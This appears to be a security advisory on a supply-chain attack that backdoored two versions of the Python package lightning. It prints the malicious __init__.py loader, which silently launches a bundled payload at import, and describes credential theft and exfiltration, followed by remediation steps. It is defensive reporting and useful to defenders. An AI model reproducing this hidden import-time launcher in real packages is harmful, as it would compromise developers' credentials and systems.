Mini Shai-Hulud Jumps to PyPI: Lightning Package Backdoored to Drain Developer Credentials

Overview

On April 30, the Mini Shai-Hulud campaign made its first known move onto PyPI. The target is lightning, a Python framework widely used in the machine-learning community for building and training PyTorch models. Versions 2.6.2 and 2.6.3 were published with embedded malware that activates on import, harvesting credentials, cloud secrets, and cryptocurrency wallets without any visible indication. Any machine that loaded either version should be treated as fully compromised.

This is the third incident attributed to the campaign, following earlier attacks against the Bitwarden CLI npm package and four SAP npm packages. Moving onto PyPI substantially widens the attacker's reach: lightning runs on developer laptops, research workstations, and GPU-backed CI environments — all of which tend to hold high-value secrets.

Injection Point

The malicious code is embedded in __init__.py, Python's package entry point — meaning it runs at import time, before any user code executes and before the calling application has a chance to check anything. A background daemon thread is started immediately to launch the hidden payload bundled inside the package:

def _run_runtime() -> None:
    _runtime_dir = os.path.join(os.path.dirname(__file__), "_runtime")
    _start = os.path.join(_runtime_dir, "start.py")
    if os.path.exists(_start):
        subprocess.Popen(
            [sys.executable, _start],
            cwd=_runtime_dir,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )

threading.Thread(target=_run_runtime, daemon=True).start()

Delivery

start.py is a cross-platform bootstrapper that fingerprints the OS and CPU architecture, fetches Bun v1.3.13 from GitHub Releases if not already present, and hands execution to router_runtime.js — an 11 MB compiled payload. The same two-stage Bun bootstrapping pattern appeared in both the Bitwarden and SAP incidents, pointing to shared infrastructure across the campaign.

Payload

The payload sweeps a broad range of targets. Developer credentials include SSH keys, shell histories (bash, zsh, Python, Node, MySQL, psql), .env files, git credentials, npm tokens, and MCP configs. Cloud provider files from AWS, GCP, and Azure are collected alongside Kubernetes and Helm configs and Docker credentials. On machines with cryptocurrency software, wallet data is lifted from Bitcoin, Litecoin, Monero, Dogecoin, Dash, Exodus, Atomic, and Ledger. VPN credentials from NordVPN, ProtonVPN, CyberGhost, Windscribe, and OpenVPN are taken, along with Discord and Slack session tokens.

Exfiltration

Before exfiltration, all stolen data is RSA-2048 encrypted and pushed to attacker-controlled public GitHub repositories, making outbound traffic blend with normal developer activity and complicating network-level detection.

Remediation

Upgrade to lightning==2.6.4 or later immediately. For any machine that ran the affected versions, rotate all credentials that were present: cloud access keys, SSH keys, API tokens, and any secrets stored in .env files. Check for unexpected GitHub activity and review running processes for instances of Bun.

IOCs